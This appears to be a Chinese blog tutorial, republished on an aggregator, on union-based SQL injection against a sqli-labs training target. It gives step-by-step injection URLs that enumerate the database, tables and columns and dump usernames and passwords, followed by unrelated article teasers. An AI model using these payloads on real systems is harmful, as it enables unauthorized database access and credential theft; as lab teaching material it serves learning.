sql_lab中sql注入之union联合注入

sql_lab中sql注入之union联合注入

article2025/1/24 17:53:15/文章来源:https://blog.csdn.net/qq_59020256/article/details/135099390

1.判断注入类型

gxalabs.com - 该网站正在出售！ - gxalabs 资源和信息。没有回显

http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=1 and 1=1

http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=1 and 1=2 and1=1和and1=2回显效果一致，则判断不是数字型

http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=1'' 有回显

则判断出是字符型注入，且注入是’注入

2.判断注入点

http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=1' and 1=1 --+ 表示and两边结果为真，返回结果正常

http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=1' and 1=2 --+ 表示一边为真一边为假，没有返回值

则判断是sql注入

3.判断字段数量

http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=1' order by 5 --+ 没有结果

http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=1' order by 4 --+ 没有结果

http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=1' order by 3 --+ 有回显结果

说明该数据库的字段数量是3

4.用union联合查询，判断回显点

http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=-1' union select 1,2,3 --+

5.查询使用的是那个数据库

http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=-1' union select 1,database(),3 --+

6.查询表名

http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema="security" --+

查询到了security数据库里面的所有表名

7.查询users表里面的字段名

http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=-1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users" --+

8.查username和password

http://sss-s347glt.gxalabs.com/Pass-02/index.php?id=-1' union select 1,group_concat(username),group_concat(password) from users --+

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：/a/258104.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈qq邮箱809451989@qq.com，一经查实，立即删除！

相关文章

Ps：文本的基本操作

Ps：文本的基本操作

在输入文字前，先确定是输入点文本还是段落文本，尽管二者可以相互转换。既可以对文本图层中的所有文本统一设置格式、移动或变换，也可以选择其中的一个或几个字符、一行或一段进行编辑。新建点文本使用文字工具在画布上单击并开始输入的文字…

阅读更多...

[toolschain] 头文件有下划线报错不好看，ubuntu下vscode如何设置包含目录路径，以及如何找到安装包的头文件

[toolschain] 头文件有下划线报错不好看，ubuntu下vscode如何设置包含目录路径，以及如何找到安装包的头文件

写在前面本文是把之前的散落在不同blog中的记录，总结单独合成了一篇文章 vscode 如何配置文件路径之前使用visual studio 感觉在这一点上更方便，如果vscode 要配置一下。新建：c_cpp_properties.json 或者 ctrl shift p在设置中查找 c…

阅读更多...

深度学习目标检测（2）yolov3设计思想

深度学习目标检测（2）yolov3设计思想

YOLOv3基础 YOLOv3算法基本思想可以分成两部分： 按一定规则在图片上产生一系列的候选区域，然后根据这些候选区域与图片上物体真实框之间的位置关系对候选区域进行标注。跟真实框足够接近的那些候选区域会被标注为正样本，同时将真实框的位置…

阅读更多...

[Win10系统] Win10 任务栏软件图标显示为空白 | 解决方案

[Win10系统] Win10 任务栏软件图标显示为空白 | 解决方案

文章目录 [Win10系统] Win10 任务栏软件图标显示为空白 | 解决方案前言产生错误的原因解决方案方法一：手动操作方法二：自动操作总结 [Win10系统] Win10 任务栏软件图标显示为空白 | 解决方案前言有时候，我们在使用 Windows 10 系统时&…

阅读更多...

栈——OJ题

栈——OJ题

📘北尘_：个人主页 🌎个人专栏:《Linux操作系统》《经典算法试题》《C》《数据结构与算法》 ☀️走在路上，不忘来时的初心文章目录一、最小栈1、题目讲解2、思路讲解3、代码实现二、栈的压入、弹出序列1、题目讲解2、思路讲解…

阅读更多...

SpringMVC---详细介绍+使用

SpringMVC---详细介绍+使用

文章目录什么是SpringMVC？使用SpringMVCSpringMVC创建和连接创建连接RequestMapping的基础使用获取参数返回数据返回静态页面返回非页面的普通数据（text/html）返回JSON对象请求转发或者请求重定向什么是SpringMVC？ SpringMVC它…

阅读更多...

深入理解 HTTP 和 HTTPS：提升你的网站安全性(下)

深入理解 HTTP 和 HTTPS：提升你的网站安全性(下)

🤍 前端开发工程师（主业）、技术博主（副业）、已过CET6 🍨 阿珊和她的猫_CSDN个人主页 🕠 牛客高级专题作者、在牛客打造高质量专栏《前端面试必备》 🍚 蓝桥云课签约作者、已在蓝桥云…

阅读更多...

机器人制作开源方案 | 智能落叶清扫机器人

机器人制作开源方案 | 智能落叶清扫机器人

作者：李聪赛马嘉骏李佳豪邵一鸣池宏伟单位：唐山学院指导老师：袁娜 1. 引言近年来，随着人工智能科学和计算机技术人工智能科学的飞速发展，智能机器人技术已成为当代机器人研究领域的热门话题。其中服务机器人…

阅读更多...

MySQL表的增删改查（初阶）

MySQL表的增删改查（初阶）

CRUD 即增加(Create)、查询(Retrieve)、更新(Update)、删除(Delete)四个单词的首字母缩写。且增删改查（CRUD，create，retrieve，update，delete）数据库的核心模块。 1. 新增（Create） 实…

阅读更多...

120. 三角形最小路径和

120. 三角形最小路径和

三角形最小路径和描述 : 给定一个三角形 triangle ，找出自顶向下的最小路径和。每一步只能移动到下一行中相邻的结点上。相邻的结点在这里指的是下标与上一层结点下标相同或者等于上一层结点下标 1 的两个结点。也就是说，如果正位于当前行的…

阅读更多...

C语言—每日选择题—Day51

C语言—每日选择题—Day51

指针相关博客打响指针的第一枪：指针家族-CSDN博客深入理解：指针变量的解引用与加法运算-CSDN博客第一题 1. 对于函数void f(int x);，下面调用正确的是（） A：int y f(9); B：f(9); C&#xf…

阅读更多...

Leetcode—96.不同的二叉搜索树【中等】

Leetcode—96.不同的二叉搜索树【中等】

2023每日刷题（六十四） Leetcode—96.不同的二叉搜索树算法思想实现代码 class Solution { public:int numTrees(int n) {vector<int> G(n 1, 0);G[0] 1;G[1] 1;for(int i 2; i < n; i) {for(int j 1; j < i; j) {G[i] G[j - 1] * …

阅读更多...

Ubuntu18.04 上通过 jihu 镜像完成 ESP-IDF 编译环境搭建流程

Ubuntu18.04 上通过 jihu 镜像完成 ESP-IDF 编译环境搭建流程

为了解决国内开发者从 github 克隆 esp 相关仓库慢的问题，已将 esp-idf 和部分重要仓库及其关联的子模块镜像到了 jihu，这些仓库将自动从原始仓库进行同步。此篇博客用来阐述 Ubuntu18.04 上通过 jihu 镜像完成 ESP-IDF 编译环境搭建流程。注&#xff1…

阅读更多...

AOP与日志(下)

AOP与日志(下)

作者简介：大家好，我是smart哥，前中兴通讯、美团架构师，现某互联网公司CTO 联系qq：184480602，加我进群，大家一起学习，一起进步，一起对抗互联网寒冬日志分类有时候我们所…

阅读更多...

ffmpeg windows开发之一（编译安装及入门指南）

ffmpeg windows开发之一（编译安装及入门指南）

一. 源码包下载下载地址： Download FFmpegDownload FFmpeg 点击more lease，然后下载二： MSYS2安装 ： 下载地址：MSYS2 执行命令：pacman -Syu pacman -S mingw-w64-x86_64-gcc pacman -S mingw-w64-x86_64…

阅读更多...

【Spring】14 ApplicationEventPublisherAware 接口

【Spring】14 ApplicationEventPublisherAware 接口

文章目录 1. 简介2. 作用3. 使用3.1 创建并实现接口3.2 配置 Bean 信息3.3 创建启动类3.4 启动3.5 工作流程图 4. 应用场景总结 Spring 框架为开发者提供了丰富的扩展点，其中之一是 Bean 生命周期中的回调接口。本文将专注介绍一个与事件发布相关的接口 Applicatio…

阅读更多...

Windows 系统下本地单机搭建 Redis（一主二从三哨兵）

Windows 系统下本地单机搭建 Redis（一主二从三哨兵）

目录一、Redis环境准备： 1、下载redis 2、Windows下的.msi安装和.zip格式区别： 二、哨兵介绍： 1、一主二从三哨兵理论图： 2.哨兵的主要功能： 3.哨兵用于实现 redis 集群的高可用，本身也是分布式的&…

阅读更多...

LeetCode 1901. 寻找峰值 II

LeetCode 1901. 寻找峰值 II

一、题目 1、题目描述一个 2D 网格中的峰值是指那些严格大于其相邻格子(上、下、左、右)的元素。给你一个从 0 开始编号的 m x n 矩阵 mat ，其中任意两个相邻格子的值都不相同。找出任意一个峰值 mat[i][j] 并返回其位置 [i,j] 。你可以假设整个矩阵…

阅读更多...

服务端主动给客户端发消息？实战教学：使用Nestjs实现服务端推送SSE

服务端主动给客户端发消息？实战教学：使用Nestjs实现服务端推送SSE

前言服务端消息推送SSE是常用的服务器消息通信手段，适用于服务器主动给客户端发送消息的场景，例如私信通知，扫描登录等都可以使用SSE实现。SSE的底层原理是客户端与服务端建立 HTTP 长链接。 Nestjs 框架内置了对SSE的支持，本文…

阅读更多...

前端性能监控和错误监控

前端性能监控和错误监控

聚沙成塔每天进步一点点 ⭐ 专栏简介前端入门之旅：探索Web开发的奇妙世界欢迎来到前端入门之旅！感兴趣的可以订阅本专栏哦！这个专栏是为那些对Web开发感兴趣、刚刚踏入前端领域的朋友们量身打造的。无论你是完全的新手还是有一些基础的开发…

阅读更多...

最新文章